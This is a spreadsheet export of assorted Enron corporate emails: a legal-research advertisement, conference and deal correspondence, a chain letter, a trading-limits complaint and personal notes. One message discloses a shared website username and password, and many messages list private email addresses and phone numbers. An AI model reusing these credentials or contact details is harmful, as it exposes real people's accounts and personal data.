TheLaw.net, privately held and successful from Day One, represents the next _x000D_
logical step; a big improvement over slogging through two billion web pages _x000D_
and otherwise watching legal research costs spiral out of control at a time _x000D_
when with normal free market principles at work, such costs would be _x000D_
plummeting._x000D_
_x000D_
Imagine. No surprises. No meters. No printing, downloading, pay-per-view or _x000D_
on-demand fees. In short, none of the gamesmanship you have come to expect _x000D_
and never appreciated._x000D_
_x000D_
At your option, we can build your packages and deliver them today via our web _x000D_
site or we can ship CDs via U.S. Priority Mail or FedEx. We thank you for _x000D_
your time and we hope to hear from you soon while the April savings last!_x000D_
_x000D_
Regards,_x000D_
_x000D_
MARK WHITNEY_x000D_
CEO/President, TheLaw.net Corporation_x000D_
Chicago - San Diego, USA_x000D_
Toll Free: 1.877.4.LAWNET (1.877.452.9638)_x000D_
_x000D_
******************************************_x000D_
_x000D_
CASES INCLUDED IN THE DATABASE AND YEAR OF ORIGIN_x000D_
-----Sorted in Order of Federal Circuit_x000D_
---------See also, http://www.thelaw.net/compare.htm_x000D_
_x000D_
--United States Supreme Court 1900_x000D_
--Federal Circuit 1982_x000D_
--U.S. Court of Appeals, D.C. Circuit 1950_x000D_
_x000D_
FIRST FEDERAL CIRCUIT_x000D_
--U.S. Court of Appeals, First Circuit 1930_x000D_
--Maine Supreme Judicial Court 1996_x000D_
--Massachusetts Supreme Judicial Court 1930_x000D_
--Massachusetts Appeals Court 1930_x000D_
--New Hampshire Supreme Court 1930_x000D_
--Rhode Island Supreme Court 1950_x000D_
_x000D_
SECOND FEDERAL CIRCUIT_x000D_
--U.S. Court of Appeals, Second Circuit 1930_x000D_
--Connecticut Supreme Court 1950_x000D_
--Connecticut Appellate Court 1950_x000D_
--New York Court of Appeals 1955_x000D_
--New York Supreme Court, Appellate Div. 1st Dept. 1955_x000D_
--New York Supreme Court, Appellate Div. 2nd Dept. 1955_x000D_
--New York Supreme Court, Appellate Div. 3rd Dept. 1955_x000D_
--New York Supreme Court, Appellate Div. 4th Dept. 1955_x000D_
--New York Supreme Court, Appellate Term 1st Dept. 1955_x000D_
--New York Supreme Court, Appellate Term 2nd Dept. 1955_x000D_
--Vermont Supreme Court 1930_x000D_
_x000D_
THIRD FEDERAL CIRCUIT_x000D_
--U.S. Court of Appeals, Third Circuit 1930_x000D_
--U.S. District Court, New Jersey 1999_x000D_
--New Jersey Supreme Court 1930_x000D_
--New Jersey Superior Court, Appellate Division 1930_x000D_
--U.S. District Court, Eastern, Pennsylvania 1997_x000D_
--Pennsylvania Supreme Court 1950_x000D_
--Pennsylvania Superior Court 1950_x000D_
--Pennsylvania Commonwealth Court 1950_x000D_
_x000D_
FOURTH FEDERAL CIRCUIT_x000D_
--U.S. Court of Appeals, Fourth Circuit 1930_x000D_
--U.S. District Court, Maryland 1999_x000D_
--Maryland Court of Appeals 1950_x000D_
--Maryland Special Court of Appeals 1950_x000D_
--North Carolina Supreme Court 1945_x000D_
--North Carolina Court of Appeals 1968_x000D_
--U.S. District Court, South Carolina 1999_x000D_
--South Carolina Supreme Court 1996_x000D_
--South Carolina Court of Appeals 1996_x000D_
--Virginia Supreme Court 1930_x000D_
--Virginia Court of Appeals 1930_x000D_
--West Virginia Supreme Court of Appeals 1991_x000D_
_x000D_
FIFTH FEDERAL CIRCUIT_x000D_
--U.S. Court of Appeals, Fifth Circuit 1930_x000D_
--Louisiana Supreme Court 1980_x000D_
--Louisiana Court of Appeals, 1st Circuit 1980_x000D_
--Louisiana Court of Appeals, 2nd Circuit 1980_x000D_
--Louisiana Court of Appeals, 3rd Circuit 1980_x000D_
--Louisiana Court of Appeals, 4th Circuit 1980_x000D_
--Louisiana Court of Appeals, 5th Circuit 1980_x000D_
--U.S. District Court, Northern, Mississippi 1997_x000D_
--Mississippi Supreme Court 1994_x000D_
--Mississippi Court of Appeals 1994_x000D_
--Texas Supreme Court 1950_x000D_
--Texas Court of Criminal Appeals 1950_x000D_
--Texas Court of Appeals, 1st District 1950_x000D_
--Texas Court of Appeals, 2nd District 1950_x000D_
--Texas Court of Appeals, 3rd District 1950_x000D_
--Texas Court of Appeals, 4th District 1950_x000D_
--Texas Court of Appeals, 5th District 1950_x000D_
--Texas Court of Appeals, 6th District 1950_x000D_
--Texas Court of Appeals, 7th District 1950_x000D_
--Texas Court of Appeals, 8th District 1950_x000D_
--Texas Court of Appeals, 9th District 1950_x000D_
--Texas Court of Appeals, 11th District 1950_x000D_
_x000D_
SIXTH FEDERAL CIRCUIT_x000D_
--U.S. Court of Appeals, Sixth Circuit 1930_x000D_
--Kentucky Supreme Court 1945_x000D_
--Kentucky Court of Appeals 1945_x000D_
--Michigan Supreme Court 1930_x000D_
--Michigan Court of Appeals 1965_x000D_
--Ohio Supreme Court 1950_x000D_
--Ohio Court of Appeals, 1st District 1950_x000D_
--Ohio Court of Appeals, 2nd District 1950_x000D_
--Ohio Court of Appeals, 3rd District 1950_x000D_
--Ohio Court of Appeals, 4th District 1950_x000D_
--Ohio Court of Appeals, 5th District 1950_x000D_
--Ohio Court of Appeals, 6th District 1950_x000D_
--Ohio Court of Appeals, 7th District 1950_x000D_
--Ohio Court of Appeals, 8th District 1950_x000D_
--Ohio Court of Appeals, 9th District 1950_x000D_
--Ohio Court of Appeals, 10th District 1950_x000D_
--Ohio Court of Appeals, 11th District 1950_x000D_
--Ohio Court of Appeals, 12th District 1950_x000D_
--Tennessee Supreme Court 1950_x000D_
--Tennessee Court of Appeals, Middle Grand Division 1950_x000D_
--Tennessee Court of Appeals, Eastern Grand Division 1950_x000D_
--Tennessee Court of Appeals, Western Grand Division 1950_x000D_
--Tennessee Court of Criminal Appeals, Middle Grand Division 1950_x000D_
--Tennessee Court of Criminal Appeals, Eastern Grand Division 1950_x000D_
--Tennessee Court of Criminal Appeals, Western Grand Division 1950_x000D_
_x000D_
SEVENTH FEDERAL CIRCUIT_x000D_
--U.S. Court of Appeals, Seventh Circuit 1930_x000D_
--Illinois Supreme Court 1985_x000D_
--Illinois Appellate Court, 1st District 1985_x000D_
--Illinois Appellate Court, 2nd District 1985_x000D_
--Illinois Appellate Court, 3rd District 1985_x000D_
--Illinois Appellate Court, 4th District 1985_x000D_
--Illinois Appellate Court, 5th District 1985_x000D_
--Indiana Supreme Court 1940_x000D_
--Indiana Court of Appeals, 1st District 1940_x000D_
--Indiana Court of Appeals, 2nd District 1940_x000D_
--Indiana Court of Appeals, 3rd District 1940_x000D_
--Indiana Court of Appeals, 4th District 1940_x000D_
--Indiana Court of Appeals, 5th District 1940_x000D_
--Indiana Tax Court 1986_x000D_
--Wisconsin Supreme Court 1945_x000D_
--Wisconsin Court of Appeals, District I 1945_x000D_
--Wisconsin Court of Appeals, District II 1945_x000D_
--Wisconsin Court of Appeals, District III 1945_x000D_
--Wisconsin Court of Appeals, District IV 1945_x000D_
_x000D_
EIGHTH FEDERAL CIRCUIT_x000D_
--U.S. Court of Appeals, Eighth Circuit 1930_x000D_
--Arkansas Supreme Court 1957_x000D_
--Arkansas Court of Appeals 1957_x000D_
--Iowa Supreme Court 1995_x000D_
--Iowa Court of Appeals 1995_x000D_
--Minnesota Supreme Court 1930_x000D_
--Minnesota Court of Appeals 1983_x000D_
--Missouri Supreme Court 1960_x000D_
--Missouri Court of Appeals 1960_x000D_
--Nebraska Supreme Court 1965_x000D_
--Nebraska Court of Appeals 1965_x000D_
--U.S. District Court, North Dakota 1999_x000D_
--North Dakota Supreme Court 1930_x000D_
--North Dakota Court of Appeals 1930_x000D_
--South Dakota Supreme Court 1965_x000D_
_x000D_
NINTH FEDERAL CIRCUIT_x000D_
--U.S. Court of Appeals, Ninth Circuit 1941_x000D_
--Alaska Supreme Court 1960_x000D_
--Alaska Court of Appeals 1960_x000D_
--Arizona Supreme Court 1930_x000D_
--Arizona Court of Appeals, 1st Division 1930_x000D_
--Arizona Court of Appeals, 2nd Division 1930_x000D_
--U.S. District Court, Central, California 1998_x000D_
--California Supreme Court 1930_x000D_
--California Court of Appeal, 1st Appellate District 1930_x000D_
--California Court of Appeal, 2nd Appellate District 1930_x000D_
--California Court of Appeal, 3rd Appellate District 1930_x000D_
--California Court of Appeal, 4th Appellate District 1930_x000D_
--California Court of Appeal, 5th Appellate District 1930_x000D_
--California Court of Appeal, 6th Appellate District 1930_x000D_
--Hawaii Supreme Court 1930_x000D_
--Hawaii Intermediate Court of Appeals 1930_x000D_
--Idaho Supreme Court 1965_x000D_
--Idaho Court of Appeals 1965_x000D_
--Montana Supreme Court 1993_x000D_
--Nevada Supreme Court 1950_x000D_
--Oregon Supreme Court 1950_x000D_
--Oregon Court of Appeals 1950_x000D_
--Washington Supreme Court 1935_x000D_
--Washington Court of Appeals, 1st Division 1969_x000D_
--Washington Court of Appeals, 2nd Division 1969_x000D_
--Washington Court of Appeals, 3rd Division 1969_x000D_
_x000D_
TENTH FEDERAL CIRCUIT_x000D_
--U.S. Court of Appeals, Tenth Circuit 1930_x000D_
--Tenth Circuit Bankruptcy Appellate Panel_x000D_
--Colorado Supreme Court 1930_x000D_
--Colorado Court of Appeals 1930_x000D_
--Kansas Supreme Court 1982_x000D_
--Kansas Court of Appeals 1982_x000D_
--New Mexico Supreme Court 1930_x000D_
--New Mexico Court of Appeals 1930_x000D_
--Oklahoma Supreme Court 1994_x000D_
--Oklahoma Court of Criminal Appeals 1994_x000D_
--Oklahoma Court of Appeals 1994_x000D_
--Utah Supreme Court 1950_x000D_
--Utah Court of Appeals 1950_x000D_
--Wyoming Supreme Court 1993_x000D_
_x000D_
ELEVENTH FEDERAL CIRCUIT_x000D_
--U.S. Court of Appeals, Eleventh Circuit 1981_x000D_
--Alabama Supreme Court 1955_x000D_
--Alabama Court of Civil Appeals 1955_x000D_
--Alabama Court of Criminal Appeals 1955_x000D_
--Florida Supreme Court 1950_x000D_
--Florida District Court of Appeal, 1st District 1950_x000D_
--Florida District Court of Appeal, 2nd District 1950_x000D_
--Florida District Court of Appeal, 3rd District 1950_x000D_
--Florida District Court of Appeal, 4th District 1950_x000D_
--Florida District Court of Appeal, 5th District 1950_x000D_
--Georgia Supreme Court 1940_x000D_
--Georgia Court of Appeals 1940_x000D_
_x000D_
****************************************************************_x000D_
PRIVACY STATEMENT: TheLaw.net respects your time and we believe this is the _x000D_
fastest, least intrusive method of originating contact with busy _x000D_
professionals. But we also provide several mechanisms allowing recipients to _x000D_
remove themselves easily and at no cost. Simply go to: _x000D_
http://www.thelaw.net/remove.htm OR reply to: remove@thelaw.net and enter the _x000D_
email address that you would like removed in the subject line OR call toll _x000D_
free 1.877.452.9638. See also: http://www.thelaw.net and click "Privacy _x000D_
Statement"._x000D_
*****************************************************************_x000D_
_x000D_
FindLaw is a registered trademark of West Group. Lexis, Lexis-Nexis and _x000D_
lexisONE are registered trademarks of LEXIS-NEXIS, a division of Reed _x000D_
Elsevier Inc._x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 May 2000 03:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'betty.alexander@enron.com'})</t>
  </si>
  <si>
    <t>Mr. Big Shot!</t>
  </si>
  <si>
    <t>Vince -_x000D_
I couldn't have been more pleased than when I saw your name on the Managing _x000D_
Director promotion list last January - who says nice guys finish last!  _x000D_
_x000D_
I've had the announcement in my "to do" folder all this time, waiting for me _x000D_
to catch up enough to send you this message, but I guess you're no stranger _x000D_
to that scenario...._x000D_
_x000D_
Nothing stochastic about it, you're simply the best!_x000D_
_x000D_
Betty  :)</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 15:06:07 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
RIGZONE DAILY NEWS -- WEDNESDAY, JANUARY 23, 2002_x000D_
------------------------------------------------------------_x000D_
Daily News from the worldwide upstream oil &amp; gas industry_x000D_
   to view the complete version, please go to: _x000D_
   http://www.rigzone.com/newsletter_show.asp?n_id=206_x000D_
------------------------------------------------------------</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 07:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Intelligence Press</t>
  </si>
  <si>
    <t>Tana,_x000D_
I sent a message to Dexter Steis at Intelligence Press to tell him to expect _x000D_
the amendment from you.  Also, I faxed you the copy of the signed original.  _x000D_
Please ignore what I sent you in the inter-office mail. _x000D_
_x000D_
Thanks._x000D_
Julie</t>
  </si>
  <si>
    <t>Mon, 18 Oct 1999 04:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marie.heard@enron.com', 'tana.jones@enron.com', 'shari.stack@enron.com', 'sara.shackleton@enron.com', 'carol.clair@enron.com', 'susan.flynn@enron.com', 'brent.hendry@enron.com', 'susan.bailey@enron.com'})</t>
  </si>
  <si>
    <t>Derivatives Week on the Web</t>
  </si>
  <si>
    <t>The people at Derivatives Week assure me that we should have access to their _x000D_
web site (www.derivativesweek.com) by Wednesday. _x000D_
_x000D_
User ID: enalegal_x000D_
Password: swap</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 01:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>How do you come up with all this?  Did someone teach you how to write _x000D_
accomplishments?  This is awesome.  I hadn't thought about integrating my _x000D_
goals into my accomplishments.  And you consider me an overachiever!!_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 04:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jshaw@iirltd.co.uk'})</t>
  </si>
  <si>
    <t>Real Options Conference - Speaker Confirmation</t>
  </si>
  <si>
    <t>Dear Steven,_x000D_
_x000D_
Further to our conversation I am delighted that you will be speaking at the_x000D_
forthcoming Real Options conference which will take place on Monday 27th &amp;_x000D_
Tuesday 28th November in Central London._x000D_
_x000D_
I have attached the pdf of the conference Vince spoke at in February and the_x000D_
draft programme of the November conference._x000D_
_x000D_
As discussed could you please email me with a suggested talk title and_x000D_
between 5 and 8 bullet points to be included in the conference programme._x000D_
It would be great if you could emphasise the practicality of your talk and_x000D_
that you will be using your own experience of working with real options at_x000D_
Enron as part of the talk._x000D_
_x000D_
If you do have the delegate list from the IQPC conference it would be useful_x000D_
to see who attended so that we can improve on our marketing for the_x000D_
conference in november.  You can either email me or fax it to me on 020 7393_x000D_
0313._x000D_
_x000D_
I look forward to receiving your talk in the next day or so._x000D_
_x000D_
Kind regards_x000D_
_x000D_
Julia_x000D_
_x000D_
Julia Shaw_x000D_
Senior Conference Producer_x000D_
Tel:020 7915 5650_x000D_
Fax:020 7915 5001_x000D_
Email:jshaw@iirltd.co.uk_x000D_
Web address:www.iir-conferences.com_x000D_
_x000D_
_x000D_
_x000D_
 - prog3.pdf_x000D_
 - talktitles.rtf</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 03:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Intrastate Pipeline Opportunity</t>
  </si>
  <si>
    <t>Gerald,_x000D_
_x000D_
Would you please take a look at this and let's discuss._x000D_
_x000D_
Thanks,_x000D_
Chris_x000D_
----- Forwarded by Chris Hilgert/HOU/ECT on 02/12/2001 11:05 AM -----_x000D_
_x000D_
	"Redinger, Andy" &lt;aredinger@mcdinvest.com&gt;_x000D_
	02/04/2001 09:00 PM_x000D_
		 _x000D_
		 To: "'Chris.Hilgert@enron.com'" &lt;Chris.Hilgert@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Intrastate Pipeline Opportunity_x000D_
_x000D_
_x000D_
Chris_x000D_
_x000D_
Please find attached the CA for the intrastate pipeline opportunity that we_x000D_
discussed. Please execute a copy and fax it back to my attention at_x000D_
216-443-2993._x000D_
_x000D_
The Board meeting went well on Friday and the shareholders have decided to_x000D_
sell all or a part of the intrastate pipeline system. As we have discussed_x000D_
this pipeline has direct access to Chicago and Dawn and is the cheapest_x000D_
transportation path into the heavily industrialized areas of northeast Ohio._x000D_
In addition, it is the logical source of supply for several gas fired_x000D_
generating facilities being developed in northwestern Ohio. With McDonalds_x000D_
assistance the Company is planning to put together an informational_x000D_
memorandum and go to the marketplace in the next two weeks. Looking forward_x000D_
to speaking with you further about this opportunity._x000D_
_x000D_
Sincerely_x000D_
_x000D_
Andrew Redinger_x000D_
Senior Vice President_x000D_
Energy Investment Banking Group_x000D_
McDonald Investments Inc_x000D_
Tel: 216-443-2305_x000D_
Fax: 216-443-2993_x000D_
aredinger@mcdinvest.com_x000D_
_x000D_
 &lt;&lt;ChrisHilgertCA.doc&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - ChrisHilgertCA.doc</t>
  </si>
  <si>
    <t>Mon, 3 Apr 2000 10:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Mark, this is the schedule to the Management Agreement sent earlier._x000D_
---------------------- Forwarded by Deborah Culver/HOU/EES on 04/03/2000 _x000D_
05:50 PM ---------------------------_x000D_
_x000D_
_x000D_
"Mary Moreland" &lt;mmoreland@bracepatt.com&gt; on 04/03/2000 05:24:05 PM_x000D_
To: &lt;deborah.culver@enron.com&gt;_x000D_
cc: "Sheryl Gussett" &lt;sgussett@bracepatt.com&gt;, "William Marlow" _x000D_
&lt;wmarlow@bracepatt.com&gt; _x000D_
Subject: Schedule_x000D_
_x000D_
_x000D_
As requested, we have attached the current draft of Schedule I to the _x000D_
Management Agreement._x000D_
_x000D_
Mary L. Moreland_x000D_
Bracewell &amp; Patterson, L.L.P._x000D_
711 Louisiana_x000D_
South Tower Pennzoil Place_x000D_
Houston, Texas 77002_x000D_
(713) 221-1147 Telephone_x000D_
(713) 221-2156 Telecopy_x000D_
_x000D_
_x000D_
 - SCHED1_1.DOC_x000D_
</t>
  </si>
  <si>
    <t>Mon, 25 Feb 2002 09:08:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'l.miller@enron.com'})</t>
  </si>
  <si>
    <t>FW: A prayer for you</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
-----Original Message-----_x000D_
From: Grannivan@aol.com [mailto:Grannivan@aol.com]_x000D_
Sent: Sunday, February 24, 2002 1:32 PM_x000D_
To: Basketgr8@aol.com; lbeeone@yahoo.com; Bacross@aol.com;_x000D_
RSTOUT@aol.com; RKB22MAR@aol.com; Bruce.hillstrom@worldspan.com;_x000D_
cglaird@networksplus.net; MGONZ88@aol.com; jmwings737@aol.com;_x000D_
midjones@msn.com; SKatspjs@cs.com; turbowbrock@yahoo.com;_x000D_
LMcfar6844@aol.com; wholelottacritters@hotmail.com; fmgbj@midmo.com;_x000D_
hogeyemill@tconl.com; nothotatall@yahoo.com; juan91470@email.msn.com_x000D_
Subject: A prayer for you_x000D_
_x000D_
_x000D_
I said a prayer for you just now..... When you receive this e-mail just _x000D_
recite the following prayer. That's all you have to do. There is nothing _x000D_
attached. This is the power of prayer at work. _x000D_
Just send this to 4 people (including me) and see what _x000D_
happens on the fourth day. Do not break this, please. There is no cost, but _x000D_
lots of rewards. Let's continue to pray for one another. _x000D_
May today there be peace within you. May you trust God that you are exactly _x000D_
where you are meant to be. May you not forget the infinite possibilities that _x000D_
are born of faith. May you use those gifts that you have received, and pass _x000D_
on the love that has been given to you. May _x000D_
you be content knowing that you are a child of God. Let His presence settle _x000D_
into your bones, and allow your soul the freedom to sing, dance, and to bask _x000D_
in the sun. He is there for each and every one of you. _x000D_
Subject: God's Work _x000D_
1. Be ye fishers of men.. You catch them - He'll clean _x000D_
them. _x000D_
~~~~~~~ _x000D_
2. Coincidence is when God chooses to remain _x000D_
anonymous. _x000D_
~~~~~~~ _x000D_
3. Don't put a question mark where God put a period. _x000D_
~~~~~~~ _x000D_
4. Don't wait for 6 strong men to take you to church. _x000D_
~~~~~~~ _x000D_
5. Forbidden fruits create many jams. _x000D_
~~~~~~~ _x000D_
6. God doesn't call the qualified, He qualifies the called _x000D_
~~~~~~~ _x000D_
7. God grades on the cross, not the curve. _x000D_
~~~~~~~ _x000D_
8. God loves everyone, but probably prefers "fruits of the _x000D_
spirit"  over "religious nuts!" _x000D_
~~~~~~~ _x000D_
9. God promises a safe landing, not a calm passage. _x000D_
~~~~~~~ _x000D_
10. He, who angers you, controls you! _x000D_
~~~~~~~ _x000D_
11. If God is your Co-Pilot - swap seats! _x000D_
~~~~~~~ _x000D_
12. Most people want to serve God, but only in an _x000D_
advisory capacity. _x000D_
~~~~~~~ _x000D_
13. Prayer: Don't give God instructions - just report for duty! _x000D_
~~~~~~~ _x000D_
14. The task ahead of us is never as great as the Power _x000D_
behind us. _x000D_
~~~~~~~ _x000D_
15. The Will of God will never take you to where the _x000D_
Grace of God will not protect you. _x000D_
~~~~~~~ _x000D_
16. We don't change the message, the message changes us. _x000D_
~~~~~~~ _x000D_
17. You can tell how big a person is by what it takes _x000D_
to discourage him. _x000D_
 Jesus Test _x000D_
 This is an easy test, you score 100 or zero. It's your _x000D_
choice. If  you aren't ashamed to do this, please follow the directions. _x000D_
Jesus said, " if you are ashamed of me, I will be ashamed of you before my _x000D_
Father."  Not ashamed? Pass this on . . . only if you mean it. Yes, I do Love _x000D_
God. He is my source of existence and Savior. He keeps me functioning each _x000D_
and every day. Without Him, I will be nothing. Without Him, I am nothing but _x000D_
with Him I can do all things through Christ that strengthens me. Phil 4:13  _x000D_
This is the simplest test . . . if you Love God, and are not ashamed of all _x000D_
the marvelous things he has done for you, send this to ten people and the _x000D_
person who sent it to you!  Hebrews 13: 15 Through Jesus, therefore, let us _x000D_
continually offer to God a sacrifice of praise - the fruit of lips that _x000D_
confess his name. </t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 10:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.nowlan@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff, as we talked earlier we need to get what you want ASAP because in these _x000D_
energy markets , which I think we both agree are not going to settle down any _x000D_
time soon, coupled with the growth you and Mike want to see we are operating _x000D_
under ridiculously small limits. 8 million VAR for a group our size , with _x000D_
our turnover and number of traders just doesn't work. We have 15 to 20 _x000D_
million of structured deals, primarlily coming from Don S that at this time _x000D_
we would have to walk away from. We can not go out and recruit more and _x000D_
better traders to have them sit at their desk and not trade do to limits _x000D_
which in no way are reflective of the size and risk Enron should be willing _x000D_
to take if they truly have bought into this being a significant global _x000D_
business. I  suggest they should have raised them already as a reflection of _x000D_
where they want to take the business and thought this through prior to the _x000D_
move  to Global Markets. You wouldn't be handed a Model T and asked to go out _x000D_
and win the Indy 500. We need the tools to make the money and VAR is just as _x000D_
important a componenet as leadership,  people, vol limits, systems _x000D_
,reporting, etc. _x000D_
 We have shut down positions  today, which will cost us significantly, due to _x000D_
the VAR issue.  All we seem to be doing now is trading and worrying about VAR _x000D_
and NOT doing what we think is right with our positions. This definitely, _x000D_
like today, has had a negative impact on P/L.We will get a chance to visit _x000D_
this issue  with Chris and John on your visit here next week. </t>
  </si>
  <si>
    <t>Wed, 27 Jun 2001 03:14:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'boughton@maui.net', 'vkamins@enron.com', 'vkaminski@aol.com'})</t>
  </si>
  <si>
    <t>RE: Test Message</t>
  </si>
  <si>
    <t>Mike,_x000D_
_x000D_
Thanks for your message. The meeting on Tuesday at 7 is confirmed._x000D_
_x000D_
Vince_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Mike Boughton &lt;boughton@maui.net&gt;@ENRON [mailto:IMCEANOTES-Mike+20Boughton+20+3Cboughton+40maui+2Enet+3E+40ENRON@ENRON.com] _x000D_
Sent:	Tuesday, June 26, 2001 7:41 PM_x000D_
To:	vkamins@enron.com; vkaminski@aol.com_x000D_
Cc:	David.Rowe@risk.sungard.com_x000D_
Subject:	Test Message_x000D_
_x000D_
Hello Vince,_x000D_
_x000D_
It was good to talk with you yesterday. David Rowe and I will be happy to_x000D_
meet with you for breakfast at 7:00 on Tuesday. I will call on Monday to_x000D_
set the location._x000D_
_x000D_
The URL for our commodity option calculator demonstration is_x000D_
_x000D_
	http://perun.otci.net/Utility_x000D_
_x000D_
Note that several of the data sets, which we obtain daily from NYMEX, are_x000D_
incomplete. NG, HO, CN, NT and CL have enough data to indicate performance._x000D_
The others are either missing altogether or the series is too short to be_x000D_
useful._x000D_
_x000D_
If you want to see the currency demonstration, it is at_x000D_
_x000D_
	http://perun.otci.net/BC_x000D_
_x000D_
and includes some technical material describing work we did in creating the_x000D_
site._x000D_
_x000D_
With best regards,_x000D_
_x000D_
Mike Boughton_x000D_
		Options Technology Company, Inc._x000D_
		       P.O. Box 1275_x000D_
		  Wailuku, Maui, Hawaii 96793_x000D_
  Telephone  808.575.9592                  Fax  808.575.9331_x000D_
	           http://www.otci.net</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 09:20:54 -0800 (PST)</t>
  </si>
  <si>
    <t>til sunday_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Wednesday, November 21, 2001 11:21 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
for how long?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Wednesday, November 21, 2001 11:20 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
next thursday_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Wednesday, November 21, 2001 11:20 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
very funny.  so when are we leaving?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Wednesday, November 21, 2001 11:18 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
nope ny_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Wednesday, November 21, 2001 11:17 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
did you book my flight to pakistan?  i am thinking that i need to be leaving soon.  like tomorrow.</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 03:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gerald.nemec@enron.com', 'bruce.rudy@enron.com'})</t>
  </si>
  <si>
    <t>FW: West Coast White Shark Trip</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Gerald and Bruce:  Thought I would just forward this message from my _x000D_
brother to you guys.  Gerald, I've heard you dive quite a bit and thought you _x000D_
might enjoy this.  My brother, Matt, is an avid diver and I trust he knows _x000D_
his stuff.  No big deal, just thought I would share._x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jessica Wentworth_x000D_
303-575-6482_x000D_
303-534-2205 FAX_x000D_
----- Forwarded by Jessica A Wentworth/NA/Enron on 12/05/2000 11:14 AM -----_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From:    O'Brien Matthew J. [mailto:mj.obrien@hosp.wisc.edu] _x000D_
Sent:   Tuesday, November 28, 2000 8:33 AM_x000D_
To:   Dave. Wentworth (E-mail); Greg Seemann (E-mail); Jay Salvo (E-mail);_x000D_
Richard C. Steinfeldt (E-mail); Steve Jacobs [Jacos11@Itis.Com] (E-mail);_x000D_
Salzmann William B._x000D_
Subject:   FW: West Coast White Shark Trip_x000D_
_x000D_
Anyone up for a little shark trip? I have dove with Paul Anes before on a_x000D_
blue shark dive trip. It was great._x000D_
MattO_x000D_
-----Original Message-----_x000D_
From:   Paul Anes [mailto:panes1@san.rr.com]_x000D_
Sent:   Monday, November 27, 2000 7:26 PM_x000D_
To:   PETER.ABASHIAN@BENTLEY.COM_x000D_
Subject:   West Coast White Shark Trip_x000D_
_x000D_
_x000D_
I am pleased to announce that details have been finalized for an upcomming_x000D_
White Shark expediton scheduled for Sept 10-14, 2001 aboard the 75 ft._x000D_
Horizon live-aboard. Cost is $1650.  This is a limited load trip. We will_x000D_
only be taking 12 divers. The Horizon will depart from San Diego bound for_x000D_
Guadelupe Island off the Baja, Mexico coast. Guadelupe Is. is known as one_x000D_
of the premier big fish destinations for long range sportsfishermen. The_x000D_
white sharks there have been scaring the hell out of the fishermen when they_x000D_
rise out of the deep to snatch the large tuna hooked by the fishermen as_x000D_
they bring them to the boat._x000D_
You can download trip details at: http://www.sdsharkdiving.com/guadalupe.htm_x000D_
I hope you can join us on this very special expediton to dive with the_x000D_
"Ultimate_x000D_
Predator"_x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
Doc Anes-San Diego Shark Diving_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 08:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dick.varner@eweb.eugene.or.us'})</t>
  </si>
  <si>
    <t>Re: Representations for ISDA Transaction</t>
  </si>
  <si>
    <t xml:space="preserve">Dick:_x000D_
_x000D_
I never heard back from you regarding my email of 4/18/01.  I had asked if _x000D_
you would mind revising the forms of certificate which we will attach to each _x000D_
trade confirmation._x000D_
_x000D_
We would appreciate revisions to the April 12, 2001 certificates.  This will _x000D_
be the format for all future transactions._x000D_
_x000D_
Please send revisions to Kimberly Hundl.  Her phone number is (713) 853-1647 _x000D_
and fax if (713) 646-2443._x000D_
_x000D_
Thanks._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 05/01/2001 03:07 PM -----_x000D_
_x000D_
	Sara Shackleton_x000D_
	04/18/2001 10:57 AM_x000D_
		_x000D_
